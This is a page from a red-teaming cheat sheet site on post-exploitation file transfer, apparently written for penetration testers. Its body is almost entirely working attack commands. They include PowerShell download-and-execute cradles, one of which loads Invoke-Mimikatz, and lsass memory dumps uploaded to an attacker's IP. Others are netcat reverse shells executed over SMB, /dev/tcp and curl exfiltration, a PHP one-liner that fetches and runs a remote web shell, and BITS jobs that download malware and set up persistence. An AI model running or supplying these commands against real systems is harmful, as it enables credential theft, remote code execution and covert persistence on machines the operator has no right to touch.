Red Teaming and Malware Analysis
  • About
  • Red Teaming
  • Cheat Sheet
    • Web
      • Misc
      • File Upload bypass
      • Authentication bypass
      • SQL Injection
      • XSS
      • XXE
      • Reverse-shell
      • Webshell
      • (De)Serialization
    • Active Directory
    • Services by port
      • Enum
      • 5060 - SIP
      • 25 - SMTP
      • 135 - RPC
      • 445 - SMB
      • 11211 - PHPMemCached
      • ldap
    • Hardening
    • Stuff
      • Basic tips/scripts
      • OpenBSD & NetBSD
      • File Transfer
      • Pivoting
  • Active Directory 101
    • Dumping Active Directory DNS using adidnsdump
    • PrintNightmare
    • From DFSCoercer to DA
  • Fuzzing and Web
    • Server Side Template Injection (SSTI)
    • Finding SSRF (all scope)
    • Format String Exploitation
    • Cache Poisoning using Nuclei
  • Initial Foothold
    • Browser In The Browser (BITB) Attack
    • Phishing with Office
      • Weaponizing XLM 4.0 macros
  • Privilege Escalation (Privesc)
    • AV/EDR Bypass
      • Bypass AV/EDR using Safe Mode
      • Resources
    • UAC bypass
    • Process migration like meterpreter
  • Lateral Movement (Pivoting)
    • From Windows VPN + Kali VPN + DC
      • By using Proxifier
  • Persistence
  • Command and Control (C&C)
    • CobaltStrike 101
      • Pivoting DMZ: weevely + ngrok + CS Pivot COMBO via Linux
      • Extras + Plugins
      • Resources
  • Data Exfiltration
    • Extracting certs/private keys from Windows using mimikatz and intercepting calls with burpsuite
  • CVE & Exploits / CTF
    • Privilege Escalation
    • Serialization
    • CVEs
      • CHIYU IoT devices
      • Chamilo-lms-1.11.x - From XSS to account takeover && backdoor implantation
    • CVE - Submission Guides
  • Tools
    • Intel
    • OSINT
    • DNS
    • WEB
      • API and WS Hacking
      • Web Discovery
      • Web Fuzzing
      • Path Traversal
      • GraphQL
      • JWT
    • Infrastructure and Network
      • Scan and Discovery
        • Network mapper
      • Automated Scanners
      • Misc
      • Active Directory
        • Burpsuite with Kerberos Auth
      • Cloud & Azure
      • Command and Control (C&C)
      • (De)serialization
      • Lateral Movement
      • Powershell
    • Privilege Escalation
    • Exfiltration
    • Persistence
    • Password & Cracking
      • Wordlists
      • Tips
      • Rainbow Crackalack
    • Static Code Analysis
    • Reporting
  • Resources
  • Pwnage
    • WiFi
      • HOSTAPD-WPE
      • Rogue APP
      • WPA3 Downgrade attack
    • NRF
    • rubber ducky
  • Malware Analysis
  • Unpacking
  • Basic tips
  • Malware instrumentation with frida
  • Tools
    • Debuggers / Disassemblers
    • Decompilers
    • Detection and Classification
    • Deobfuscation
    • Debugging and Reverse Engineering
    • Memory
    • File Analysis
    • Emulators
    • Network Traffic Analysis
    • Other
    • Online Tools
  • Resources
    • DFIR FTK Imager
    • Convert IP Range into CIDR
    • Parsing Large Raw Files and Excluding Country IP Address Ranges
    • Windows Logs Automation
      • amcache.hve
    • Windows EventViewer Analysis | DFIR
    • Prevent Windows shutdown after license expire
    • Firewall raw Logs
  • Mobile
    • Tools
    • Reverse iOS ipa
      • Jailbreak
      • Install Frida iPhone 5S
      • Frida instrumentation
      • Resources / Extra features
    • Reverse Android APKs
      • Android Dynamic Analysis
      • Bypass root + Frida
      • SSL unpining frida + Fiddler/Burp
      • Backdooring/patch APKs
    • Basic tips
    • Resources
  • IoT / Reverse / Firmware
    • Basic tips
      • Repair NTFS dirty disks
    • Reverse IoT devices
      • Reverse TP-Link Router TL-WR841N
      • Reverse Trendnet TS-S402 firmware
      • Full emulate Netgear WNAP320
      • Reverse ASUS RT-AC5300
      • Reverse LinkOne devices
    • Tools
      • Qemu + buildroot 101
      • Kernel
    • Resources
Powered by GitBook
On this page
  • Basic commands
  • execute ps1 files
  • load it into the memory
  • ninja1
  • SMB
  • SMB with password + lsass dump
  • Execute nc via SMB (bypass defenses)
  • netcat
  • copy files from target to kali
  • with PHP
  • HTTP-POST
  • /dev/tcp
  • fetch (OpenBSD)
  • rdesktop or remmina
  • BITS
  • ​updog
  • References

Was this helpful?

  1. Cheat Sheet
  2. Stuff

File Transfer

Basic commands

python -m SimpleHTTPServer 80
php -S 0.0.0.0:80

powershell.exe -c (new-object System.Net.WebClient).DownloadFile('http://10.10.14.17/nc.exe','c:\temp\nc.exe')
powershell.exe -c (Start-BitsTransfer -Source "http://10.10.14.17/nc.exe -Destination C:\temp\nc.exe")
powershell.exe wget "http://10.10.14.17/nc.exe" -outfile "c:\temp\nc.exe"
certutil.exe -urlcache -split -f "http://10.10.14.17/nc.exe" c:\temp\nc.exe
bitsadmin /transfer job /download /priority high http://10.10.14.17/nc.exe c:\temp\nc.exe
powershell -c "Invoke-WebRequest -Uri http://10.10.15.150/41020.exe -OutFile C:\Users\kostas\Desktop\41020.exe"	
powershell Invoke-WebRequest http://10.10.14.10/nc.exe -OutFile nc.exe
powershell.exe IEX(New-Object System.Net.WebClient).DownloadString('http://ip/script.ps1')
powershell -exec bypass -command "IEX (New-Object System.Net.WebClient).DownloadString('http://$PENTEST_BOX_IP/Invoke-Mimikatz.ps1');Invoke-Mimikatz"

execute ps1 files

powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File jaws.ps1
powershell.exe -ExecutionPolicy Bypass -File jaws.ps1

load it into the memory

IEX(New-Object Net.WebClient).downloadString('http://10.10.15.189:9999/jaws-enum.ps1')
powershell iex(new-object net.webclient).downloadstring(\"http://10.10.14.14/shell.ps1\")
powershell IEX(New-Object Net.WebClient).downloadstring(\"http://10.10.14.14/shell.ps1\")

ninja1

echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http://10.10.15.189:9999/jaws-enum.ps1" >>wget.ps1
echo $file = "jaws.ps1" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1

SMB

python3 /usr/share/doc/python3-impacket/examples/smbserver.py a . -smb2support
net view \\10.10.14.17
copy \\10.10.14.17\a\nc.exe .
copy nc2.exe \\10.10.14.17\a\nc2.exe

SMB with password + lsass dump

python3 /usr/share/doc/python3-impacket/examples/smbserver.py a . -smb2support -debug -comment "use it" -username admin -password 123 -ts
C:\>net use s: \\10.201.69.16\a /user:admin 123
S:\>procdump.exe -ma lsass.exe c:\TEMP\a.txt
copy c:\TEMPa.txt.dmp s:

Execute nc via SMB (bypass defenses)

\\10.10.14.17\SHARE\nc.exe -nv 10.10.14.17 4444 -e cmd.exe

netcat

ncat -lvp 80 > nc2.exe
nc -nv 10.10.14.17 < nc.exe -w 15

copy files from target to kali

.\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 608 C:\temp\lsass.dmp full
powershell -nop -w 1 -sta (New-Object System.Net.WebClient).UploadFile(\"http://10.9.4.210:9999/\", \"lsass.dmp\")
powershell -nop -w 1 -sta (New-Object System.Net.WebClient).UploadFile('http://10.92.137.181:8888', 'zzzzzz.txt.dmp')

nc -lvp 9999 > lsasss.dmp

with PHP

echo "<?php file_put_contents('nameOfFile', fopen('http://192.168.1.102/file', 'r')); ?>" > down2.php

HTTP-POST

http-post.py
./curl -F 'file=@firefox.exe_190824_231811.dmp' 10.10.15.213:8000/ -v

/dev/tcp

cat xxx.zip > /dev/tcp/10.x.x.x.x/9001
nc -lvp 9001 > xxx.zip

fetch (OpenBSD)

fetch  http://10.11.0.244/exploit.c
<?php system("fetch -o /usr/local/databases/shell.php http://10.11.0.244/shell.php; php /usr/local/databases/shell.php"); ?>

rdesktop or remmina

rdesktop -r disk:tmp=/home/user/Desktop <remote ip address>

BITS

Download file into the C:\Windows folder.

> bitsadmin /create download
> bitsadmin /addfile download https://<site>/malware.exe c:\windows\malware.exe
> bitsadmin /resume download
> bitsadmin /complete download

Created job {EA8603EB-7CC2-44EC-B1EE-E9923290C2ED}.
Added https://<site>/malware.exe -> c:\windows\malware.exe to job.
Job resumed.
Job completed.

Create persistence.

> bitsadmin /create persistence
> bitsadmin /addfile persistence http://127.0.0.1/invalid.exe c:\windows\i.exe
> bitsadmin /SetNotifyCmdLine persistence c:\windows\malware.exe NULL
> bitsadmin /resume persistence

Updog is a replacement for Python's SimpleHTTPServer. It allows uploading and downloading via HTTP/S, can set ad hoc SSL certificates and use http basic auth.

or simply:

python -m SimpleHTTPServer 8080

References

PreviousOpenBSD & NetBSDNextPivoting

Last updated 3 years ago

Was this helpful?

​

or HTTPS with upload

😎
updog
LogoBack in a Bit: Attacker Use of the Windows Background Intelligent Transfer Service | Mandiant
LogoSecurityTools/httpsWithUpload.py at master · rhmoult/SecurityToolsGitHub
LogoPost Exploitation File Transfers on Windows the Manual Way
Logo15 Ways to Download a FileNetSPI
LogoTransferring Files from Linux to Windows (post-exploitation)ropnop blog